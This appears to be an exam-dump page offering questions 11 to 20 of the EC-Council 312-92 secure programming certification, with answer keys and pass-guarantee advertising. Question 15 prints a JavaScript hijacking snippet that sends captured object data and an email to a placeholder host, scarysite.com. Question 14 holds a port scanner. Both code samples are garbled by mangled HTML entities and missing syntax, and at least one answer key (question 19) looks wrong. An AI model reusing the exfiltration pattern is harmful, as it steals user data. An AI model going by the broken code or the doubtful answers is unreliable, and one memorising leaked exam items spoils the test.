[Free] 2018(Jan) EnsurePass Dumpsleader ECCouncil 312-92 Dumps with VCE and PDF 11-20

Ensurepass.com : Ensure you pass the IT Exams
2018 Jan ECCouncil Official New Released 312-92
100% Free Download! 100% Pass Guaranteed!

EC-Council Certified Secure Programmer (ECSP)

Question No: 11

Wayne is a gaming software developer for a large video gaming company in Los Angeles. Wayne has just completed developing a new action/adventure game for the company that is to be released soon. To protect the company’s copyright on the game, Wayne would like to incorporate a technology that will restrict the use of the digital files by controlling access, altering, sharing, copying, printing, and saving. What technology does Wayne want to use?

  1. ARM

  2. WRM

  3. DRM

  4. Diffusion

Answer: C

Question No: 12

Kenny is the CIO for Fredrickson Entertainment, a gaming software company in Omaha. The developers in Kenny’s company have just finished creating a 3D first person shooter game that will be released to the market within the next couple of months. Kenny is trying to decide what type of license or activation code structure they should use for the game to prevent piracy and protect their product. Kenny decides to go with an approach that will allow each sold copy to be activated online up to five times because he knows his users might have multiple PCs or might need to reinstall the product at some point.

What type of activation policy has Kenny decided to go with?

  1. Loose license enforced – reasonable use

  2. License terms enforced – fair use

  3. Strict license terms enforced

  4. Monitor only mode

Answer: A

Question No: 13

John is creating a website using ASP. John’s web pages will have a number of calculations, so he decides to create an include file that the pages will call so he does not have to rewrite the formula numerous times. John’s website will be hosted by a server running IIS. John wants to ensure that the include source code is not revealed when the pages are viewed, so he gives the include an .asp extension.

When IIS processes the include file, which system file will be used to hide the include source code?

  1. ASP.dll

  2. Include.dll

  3. IISASP.dll

  4. IIS.dll

Answer: A

Question No: 14

Devon is an applications developer that just got back from a conference on how to correctly write code. Devon has a number of programs he has written that access data across WAN links, so he is particularly concerned about their security. Devon writes a script in C to check the security of the programs running on his internal servers. What will the following code from Devon’s script accomplish?

#include lt;iostreamgt;

#include lt;socket.cppgt;

#include lt;util.hgt; using namespace std; bool tryPort(int p); string target(quot;quot;);

int main(int argC, char *argV[])


printf(quot;PlagueZ port scanner 0.1\nquot;); int startPort = getInt(quot;start Port: quot;); int endPort = getInt(quot;end Port: quot;); target = getString(quot;Host: quot;);

printf(quot;[Processing port %d to %d]\nquot;, startPort, endPort);

for(int i=0; ilt;endPort; i )


printf(quot;[Trying port: %d]\nquot;, i); if(tryPort(i)) // port open printf(quot;[Port %d is open]\nquot;, i);


printf(quot;—Scan Finished—-\nquot;); system(quot;pausequot;);

return 0;


bool tryPort(int p)


SocketClient *scan; try


scan = new SocketClient(target, p);


catch(int e) { delete amp;scan; return false; }

delete amp;scan; return true;


  1. Scan the perimeter firewall for DoS vulnerabilities

  2. Create socket connections to the remote sites to check their security

  3. Close off any ports used by malicious code

  4. Scan for open ports

Answer: D

Question No: 15

Travis, a senior systems developer for YNY Services, received an email recently from an unknown source. Instead of opening the email on his normal production machine, Travis decides to copy the email to a thumb drive and examine it from a quarantined PC not on the network. Travis examines the email and discovers a link that is supposed to take him to http://scarysite.com. Travis decides to get back on his production computer and examine the code of that site.

From the following code snippet, what has Travis discovered?


function object() {

this.email setter = captureobject


function captureobject(x) { var objstring = “”

for(fld in this) {

obstring = fld “: ” this[fld] “, “;


obstring = “email: ” x;

var req = new XMLHttpRequest(); req.open(“GET”, “http://scarysite.com?obj=” escape(objString), true);




  1. URL obfuscation

  2. XSS attack

  3. JavaScript hijacking

  4. URL tampering

Answer: C

Question No: 16

David is a developer that has created an application using the secure RPC protocol. Before anyone can actually use the program, where must David add entries for the users so that they can gain access?

  1. /system/root/publickey

  2. /etc/root/pkusers

  3. /system/root/rpcusers

  4. /etc/publickey

Answer: D

Question No: 17

Jayson is the head developer of a team working on an inventory tracking and maintenance program. Jayson and his team are in the third phase of the software development life cycle, designing the program. In their current development phase, what material would be considered the input for their program?

  1. Design document

  2. User acceptance document

  3. Specifications document

  4. Maintenance document

Answer: C

Question No: 18

What is the new lightweight audit framework that is built into Red Hat Linux Enterprise?

  1. HelperReview

  2. Audit2

  3. SOCK review

  4. RedHat review

Answer: B

Question No: 19

Sherry is programming an online game and is trying to prevent security threats from being introduced into the game. She is also trying to prevent any kind of online cheating by searching for possible anomalies. Sherry especially wants to prevent cheating where a program or application is used to replace human reaction to produce superior results. What category of online cheating is she most concerned about?

  1. Authoritative clients

  2. Reflex augmentation

  3. Artificial intelligence intervention

  4. Vector-time augmentation

Answer: C

Question No: 20

What programming threat model with six categories includes repudiation, spoofing identity, information disclosure and so on?

  1. GUID threat model

  2. STRIDE threat model

  3. EUID threat model

  4. GUILDE threat model

Answer: B

100% Ensurepass Free Download!
Download Free Demo:312-92 Demo PDF
100% Ensurepass Free Guaranteed!
312-92 Dumps

EnsurePass ExamCollection Testking
Lowest Price Guarantee Yes No No
Up-to-Dated Yes No No
Real Questions Yes No No
Explanation Yes No No
Free VCE Simulator Yes No No
Instant Download Yes No No